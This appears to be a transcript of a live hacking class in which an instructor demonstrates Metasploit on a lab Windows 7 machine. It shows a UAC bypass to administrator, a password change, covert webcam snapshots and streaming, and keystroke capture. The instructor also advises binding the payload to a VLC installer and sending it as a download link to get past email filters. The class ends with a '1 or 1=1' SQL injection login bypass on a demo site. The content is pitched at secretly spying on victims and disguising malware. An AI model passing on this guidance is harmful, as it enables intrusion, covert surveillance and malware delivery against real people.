search for bypass UASC, SEAR. Search for bypass UAC means user account we are going to bypass. Search. So all these are the exploits. See here, exploit Windows local user bypass. I'm going to use this particular exploit now. So use exploit, paste, enter. Now we are into this particular local bypass section, right? So the same thing we has used. Then once we're done with this, set session one, because only we have only one session here. We can see that session one is there. So what we are going to do is set. We are going to bypass this particular machine. So session one. So now session one was set. So just if you type run, now what happens? See, it takes some time and it will bypass that whole Meterpreter session and it will give you that administrator privileges now. See, it is going to run this. It takes some time. See, it is started reverse TCP and it is default is it is going to set and bypassing this particular settings and continue. Once it is done, it is automatically comes into Meterpreter session. Now we'll go with shell. See, here in the previous session, whenever we click on shell, it automatically opens in attacker, right? Attacker user. But when you click here, see what happens. In Windows System 32 means full access, administrator access. Here from here, you can change the password, net space user attacker. The password is 123, right? So I'm going to change it to 789. Enter. See, command completed successfully. Now we'll go with Windows 7. We'll check whether the password is changed or not. We'll go for that. Yeah, see, the password is changed, but he doesn't know that password was changed. Whenever he logs that particular system or whenever he sign outs from that particular account, see what happens. If I log this particular machine, if I enter 123, it won't work because hacker is already changed it to 789. So 789, then only it will work. Means from here, you can change whatever you want. Even you can open a web camera also. See, I'm going to show you a web camera. How to open a web camera in a particular machine. I think it is a virtual machine. Maybe it may work or not. I don't know about that. We'll try for that. Just to know the IP address, web cameras list, webcam _ list. Say webcam Lenovo Easy Camera is there in a virtual machine. So webcam _ snapshot. See, it is taking a snapshot and it is going to save in that particular area. See, this is the snapshot right now in front of my system. So it is going to show you that it is going to take a snapshot, but he doesn't know that it has taken also. So it is saved in a Linux machine, means hacker machine. Okay, even we can see a live stream, but live stream it may work or not. I don't know. We'll try with stream. It takes time. Means accessing of web camera of a particular victim machine. See, camera was, it is going to take some time. How to embed this virus with a working application? Yes, you can bind these applications with so many applications are there to bind these. Binders are available on the internet. You can go with that binders. I'm going to show you some binders. You can go with that to bind this VLC with the original file of VLC. See, right now a live stream, whatever the streaming right now it is going on. This is a live streaming, but I think it is something struck because of some virtual machines, right? So see, it is slowly it is moving. That's it. Okay, so you can access web camera, but he doesn't know it was opened in a hacker machine. So you can see news and these movies, right? You can access camera, how to access a camera of a particular machine. So you can go with these Metasploits, and even you can get the username and passwords, whatever they are typing, whatever the username passwords they are going to type, everything can be seen from here. See how to do that one. There are so many options are available. Just go for help and go with that. See, webcam, even you can record a mic, we can webcam chat is available. Okay, key scan is nothing but it automatically captures whatever the screenshot keys you are pressing through keyboard, everything will be recorded and it will be shown. Okay, and screenshot, it is going to take a screenshot of a right now whatever the system is there, it is going to take a screenshot of a victim PC. Okay, so all these are the commands for Metasploits. I hope you all understand this. If you want, I can give you that notes and everything through after this session. Don't worry about that, how to do that and everything. Okay, and once the Metasploit session is done, we'll go with some other things which is called bypass authentication. This is a very interesting topic. Like every website will have administrator panel, right? Here what happens is For every website, there will be an administrator panel. Chat. Notes providers. Okay, sure. I will provide a notes. Don't worry about that. Okay. And this is a bypass authentication. The Metasploit was done, then bypass authentication. We are going to use an application website, and we need to log in with the administrator username and password. So first of all, you need to know how website works, right? How website is going to work for this thing. See where it is. Website works. See, this is the one how web application works, right? See, first whenever you open a login, Facebook.com, automatically it goes to the web server and web application will be opened. Whenever you enter username and password, it is going to database and then checks in a database whether username and password is right or not. If it is a right thing, if it is a correct, it will allow you into inbox. If it is not right one, it automatically gives you a thrown error message that is username password is wrong, right? This is the process they are going to follow in database. So here we are going to bluff a database. If a database administrator and web application who developed this website done any mistakes, we can easily bypass that particular machine. We can easily bypass that particular website. Okay, not a machine, a website. So here whatever we are doing is bluffing of database. Okay. Short notes, it's not easy. Okay. Gokul, I didn't understand what you are typing. I mean, what your question is. If we do it shows it contains some dangerous content and mail is unsuccessful. How to, okay. Like if you want to send an email through these attachments, right? So no need to send attachments in Gmail. There are so many options are available to send these type of applications. So just generate a link for that application, and if you give that particular link, whenever user clicks on that particular link, it automatically downloads that thing. Okay, I will show you that in a QA session. Just 2 minutes is the last thing. Just I'm going to show you one demo site. See. See, for example, this is a website. If you go for demo.testfire.net, this is a website, right? So for this thing, you need a login, right? For without username and password, we can't log in into that particular application, right? So we'll try with admin guessing passwords. So what it is going to tell you, it is logged in, right? The same way, whenever you go with some other stuff like admin, sorry. Okay. So what it is going to show you, login failed, right? Everything is good. So here what I'm going to do is bluffing a database. Simple thing. Just I'm going to inject a blind SQL injections. So I'm going to bluff a database with some injections. See here, what I'm going to write is, this is a small injection which I'm going to do. When I click on login button, it automatically logs into this particular administrator user. Means whatever I have typed here is nothing but, see, 1 or 1 is equals to 1, means it is a true condition. See, all the logic behind database is nothing but whenever the username is true, password is true, then only the result is true, right? In 10th class, we have used this one, I think so. True, false, the same thing, right? True, false, and false, true, false. The same thing logic applies for database also. See, if username is true, and the password is true, the result is true. The same thing, the same logic I applied in this thing, in this injection. See, 1 or 1, which is equals to 1 only, right? The result is 1 only. The 1 or 1 is equals to, the result is 1. Means database accepts username is true, and the same thing in password. So password is also true. So the both conditions are true. Then it allows you into inbox directly. So the logic behind database is, this is the one logic behind the database. So most of the people are going to they are not going to configure these type of injections like security. So this is a mistake of a database administrator as well as a web developer also. So this is a web application. This is called bypass authentication. Another name is bypass authentication. So these are the things, bypass authentication, and they call it as a blind SQL injection also. The another name is blind SQL injection. Sorry. So blind SQL injection, the another name for this. So these are the things which I am going to show you in this section. So I think my session was done for today, and I hope everyone is done, is interested. If you want, you can ask me any doubts. I will clear your doubts.